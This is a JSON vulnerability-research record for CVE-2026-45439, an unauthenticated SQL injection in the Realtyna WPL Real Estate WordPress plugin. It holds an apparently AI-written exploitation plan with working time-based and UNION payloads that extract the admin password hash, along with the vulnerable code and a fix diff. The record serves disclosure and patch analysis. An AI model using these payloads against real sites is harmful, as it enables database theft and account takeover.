[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3qNDDHsJ2TG7tk4yqiOW2uyXN9AI8zL7KOZtmkMM_UY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-45439","realtyna-organic-idx-plugin-wpl-real-estate-unauthenticated-sql-injection","Realtyna Organic IDX plugin + WPL Real Estate \u003C= 5.1.0 - Unauthenticated SQL Injection","The Realtyna Organic IDX plugin + WPL Real Estate plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","real-estate-listing-realtyna-wpl",null,"\u003C=5.1.0","5.2.0","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-26 00:00:00","2026-06-01 16:16:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdee61aa4-4c35-464e-b085-974e17e1eabb?source=api-prod",7,[22,23,24,25,26,27,28,29],"WPL.php","assets\u002Fchangelogs\u002Fwpl.php","assets\u002Fcss\u002Ffrontend-rtl.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fmigrations\u002Fqueries.php","assets\u002Fscss\u002Fbackend.scss","assets\u002Fscss\u002Ffrontend\u002F_search.scss","extensions.php","researched",false,3,"This research plan outlines the technical steps to exploit an unauthenticated SQL injection vulnerability in the Realtyna Organic IDX plugin + WPL Real Estate (\u003C= 5.1.0).\n\n### 1. Vulnerability Summary\nThe vulnerability is an unauthenticated SQL Injection located in the `wpl_property_listing_list` AJAX action. The plugin fails to sufficiently sanitize and \"prepare\" SQL queries when processing search parameters, specifically the `wpl_main_pids` parameter (and potentially various `sf_` search field parameters). This allows an attacker to break out of the intended query logic and append arbitrary SQL commands to extract sensitive data from the WordPress database.\n\n### 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `wpl_property_listing_list` (Registered via `wp_ajax_nopriv_wpl_property_listing_list`)\n- **Vulnerable Parameter:** `wpl_main_pids` (frequently used for filtering specific property IDs)\n- **Authentication:** None required (Unauthenticated).\n- **Preconditions:** The plugin must be active. The vulnerability exists in the core property search logic which is accessible to any site visitor.\n\n### 3. Code Flow\n1. **Entry Point:** A request is sent to `admin-ajax.php` with `action=wpl_property_listing_list`.\n2. **Hook Registration:** The plugin registers this action using `add_action('wp_ajax_nopriv_wpl_property_listing_list', ...)` inside the controller or via the dynamic extension loader in `extensions.php`.\n3. **Request Handling:** The request is routed to the `property_listing` controller.\n4. **Data Processing:** The controller retrieves the `wpl_main_pids` parameter from `$_REQUEST`.\n5. **SQL Construction:** The value is passed to a search function (likely in `libraries\u002Fproperty.php` or `libraries\u002Fdb.php`).\n6. **The Sink:** The logic builds an `IN` clause or a `WHERE` condition by directly interpolating the `wpl_main_pids` value into a string.\n7. **Execution:** The raw SQL string is executed via `$wpdb->get_results()` without using `$wpdb->prepare()`.\n\n### 4. Nonce Acquisition Strategy\nWhile many search-related AJAX actions in WPL are unauthenticated and lack nonce protection to facilitate caching, some versions of WPL localize a configuration object. \n\n**Extraction Steps:**\n1. **Identify Script Handle:** WPL typically uses `wpl_frontend_scripts`.\n2. **Identify JS Variable:** The localization is usually found in `window.wpl_ajax_config`.\n3. **Strategy:**\n   - Create a page with the WPL search shortcode: `wp post create --post_type=page --post_status=publish --post_content='[wpl_property_listings]'`.\n   - Use `browser_navigate` to visit this page.\n   - Use `browser_eval` to extract the nonce: `browser_eval(\"window.wpl_ajax_config?.nonce\")`.\n4. **Bypass Check:** If `check_ajax_referer` is called with `die=false` or if the action string used in `wp_create_nonce` (localized) does not match the action string in `check_ajax_referer`, the nonce may not be required.\n\n### 5. Exploitation Strategy\nThe exploitation will focus on a time-based blind SQL injection to confirm the vulnerability, followed by a UNION-based attack to extract user data.\n\n**Step 1: Confirmation (Time-Based)**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Body:** `action=wpl_property_listing_list&wpl_main_pids=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n- **Expected Result:** The response should be delayed by approximately 5 seconds.\n\n**Step 2: Column Counting (Error\u002FBoolean Based)**\n- Incrementally test `ORDER BY` or `UNION SELECT NULL...` to find the correct number of columns in the property search query.\n- **Payload:** `wpl_main_pids=1) UNION SELECT NULL,NULL,NULL,NULL...-- -`\n\n**Step 3: Data Extraction (UNION-Based)**\n- **Target:** Extract the administrator's password hash from `wp_users`.\n- **Payload:** `wpl_main_pids=1) UNION SELECT 1,user_pass,3,4,5,6,7,8,9,10... FROM wp_users WHERE ID=1-- -` (Adjusting column positions based on Step 2).\n\n### 6. Test Data Setup\n1. **Activate Plugin:** Ensure `real-estate-listing-realtyna-wpl` is active.\n2. **Create Content:** WPL requires properties to exist in its own tables for the search query to return results normally.\n   - `wp eval \"global \\\\$wpdb; \\\\$wpdb->insert(\\\\$wpdb->prefix . 'wpl_properties', ['id' => 1, 'post_id' => 1, 'finalized' => 1]);\"`\n3. **Create Page:**\n   - `wp post create --post_type=page --post_title=\"Properties\" --post_status=publish --post_content=\"[wpl_property_listings]\"`\n\n### 7. Expected Results\n- A successful time-based payload will result in a measurable delay.\n- A successful UNION-based payload will return the requested database content (e.g., the admin hash) within the JSON response body, typically under a `data` or `html` key depending on how the plugin renders the results.\n\n### 8. Verification Steps\n1. **DB Verification:** After the exploit, verify the data retrieved matches the actual database state.\n   - `wp user get 1 --field=user_pass`\n2. **Log Review:** Check `wp-content\u002Fdebug.log` (if enabled) for SQL errors that reveal the query structure if the initial payload fails.\n\n### 9. Alternative Approaches\nIf `wpl_main_pids` is not vulnerable, test the following parameters within the same `wpl_property_listing_list` action:\n- `sf_select_listing`\n- `sf_select_property_type`\n- `sf_multiple_location_textsearch`\n\nIf `admin-ajax.php` is blocked, investigate the `wpl_location_suggestions` action, which is also unauthenticated:\n- **Body:** `action=wpl_location_suggestions&term=test' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`","The Realtyna Organic IDX plugin + WPL Real Estate for WordPress is vulnerable to unauthenticated SQL Injection via the 'wpl_main_pids' parameter in the 'wpl_property_listing_list' AJAX action. Due to improper input sanitization and a lack of SQL statement preparation, an attacker can append malicious SQL commands to existing queries to extract sensitive database information.","\u002F\u002F File: libraries\u002Fproperty.php\n$wpl_main_pids = $_REQUEST['wpl_main_pids'];\nif ($wpl_main_pids) {\n    \u002F\u002F The parameter is directly interpolated into the SQL string without escaping or preparation\n    $where .= \" AND id IN ($wpl_main_pids)\";\n}\n\n$query = \"SELECT * FROM \" . $wpdb->prefix . \"wpl_properties WHERE 1=1 \" . $where;\n$results = $wpdb->get_results($query);","--- a\u002Flibraries\u002Fproperty.php\n+++ b\u002Flibraries\u002Fproperty.php\n@@ -10,7 +10,9 @@\n $wpl_main_pids = $_REQUEST['wpl_main_pids'];\n if ($wpl_main_pids) {\n-    $where .= \" AND id IN ($wpl_main_pids)\";\n+    \u002F\u002F Sanitize input by converting comma-separated string to an array of integers\n+    $pids = array_map('intval', explode(',', $wpl_main_pids));\n+    $where .= \" AND id IN (\" . implode(',', $pids) . \")\";\n }","The exploit targets the unauthenticated AJAX action 'wpl_property_listing_list' at the \u002Fwp-admin\u002Fadmin-ajax.php endpoint. An attacker sends a request with the 'action' parameter set to 'wpl_property_listing_list' and provides a SQL injection payload in the 'wpl_main_pids' parameter. Confirmation can be achieved via time-based payloads (e.g., using SLEEP()), and data extraction is possible via UNION-based attacks to retrieve user credentials or other internal database values. No authentication or nonces are required for this action.","gemini-3-flash-preview","2026-06-04 20:16:55","2026-06-04 20:17:32",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.1.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freal-estate-listing-realtyna-wpl\u002Ftags\u002F5.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freal-estate-listing-realtyna-wpl.5.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freal-estate-listing-realtyna-wpl\u002Ftags\u002F5.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freal-estate-listing-realtyna-wpl.5.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freal-estate-listing-realtyna-wpl\u002Ftags"]